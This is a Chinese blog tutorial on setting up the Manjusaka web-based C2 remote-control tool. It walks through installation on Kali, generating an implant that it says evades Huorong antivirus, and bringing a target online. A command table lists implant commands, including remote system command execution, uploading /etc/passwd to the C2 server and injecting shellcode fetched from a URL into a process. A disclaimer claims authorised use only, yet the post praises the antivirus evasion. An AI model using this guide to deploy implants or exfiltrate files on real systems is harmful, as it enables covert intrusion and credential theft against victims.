X黑手网
X黑手网
X黑手网

一款基于Web界面的C2远控工具Manjusaka可过火绒

免责声明

本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。

在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。

此工具仅限于安全研究和教学,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相关责任!

如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。

前言

本文为大家推荐一款基于web界面的c2工具。让我们一起来学习吧!

系统架构

image

 

在kali中安装

首先我们克隆项目地址到我们kali的本地环境。

247f187c903ab3d19ca9a8cd825e7d7

账号密码见初始日志,每个人生成的密码及默认路由都不一样。

e2e3e9a8ebf20bfa55b8b3e3fa38d07

然后,我们浏览器中访问http://ip:3200/manjusaka,便可以看到下面登录界面。则说明安装成功。

8db7d5200b056bf8f5c85ebbce27d59

接下来,我们根据终端中提供的信息进行登录系统。

16959bb1d2f4dcb4a8f1daabafe0b0b

 

新建项目

创建项目,默认有一个公共项目,通过项目【状态】开关可以控制项目是否启用状态。选择当前项目后 可在回传结果里面查看当前项目回传的信息。当然,我们可以自己创建自己的项目,具体做法如下:点击全局设置目标设置新建项目

ec40964ccd4da22ee25b63003712b0e

这里我们是内网环境,因此只填kali的IP地址。如果是公网服务器,可以填写公网IP。

image

生成shell

点击生成npc

d7dd32dc526373764ea4da40213b944

点击下载生成的shell

9b5fa15c460c92e5835132c14ba08b8

对其进行木马查杀,完美过火绒。

abbbf2da57fc463e4478f8d2dc362fc

edf3bb0657d34da78549eef6d313db9

运行后,目标成功上线。

填坑 默认监听80端口,建议在conf.toml文件中修改为其他端口。因为80端口早被其他应用如nginx占用。

04d82cfcf77a4910f7d07eab602af09

点击激活,可在npc详情中显示相应的信息。

image

虚拟终端

image

常用的终端命令

help      打印帮助 
ps        查看进程 eg: ps
ss        查看网络连接 eg: ss
ls        枚举文件 eg: ls /
cd        切换目录 eg: cd / 
sh        执行系统命令  eg: sh ps -aux  , sh tasklist  
cat       读取文本 cat a.txt
screen    执行截屏 screen
wget      下载文件 eg: wget http://192.168.1.1/a.txt <a.txt>    文件名可选 默认当前  
put       上传文件 eg: put /etc/passwd                          将passwd文件上传到nps服务器  
start     执行插件可执行文件 eg: start name <args>               需要可执行文件在plugins目录下 会自动把插件传到目标机器上面
pl        执行插件 eg: pl plugname <plugargs>                   需要插件在plugins目录下 
inject    注入进程 eg: inject pid <shellcodeurl>                shellcodeurl可选 默认下载当前shellcode下载链接

文件管理

image

为了更好的展示,我们还可以通过流程图的形式进行展示。

image

总结

manjusaka工具是一款很棒的C2工具。尤其是在免杀这块,因为很多初学者在利用cs或者msf生成shell时,最头疼的问题也莫过于免杀了。同时manjusaka也支持自定义开发插件,灵活性也大大提高。

© 版权声明
THE END
喜欢就支持一下吧
点赞11赞赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容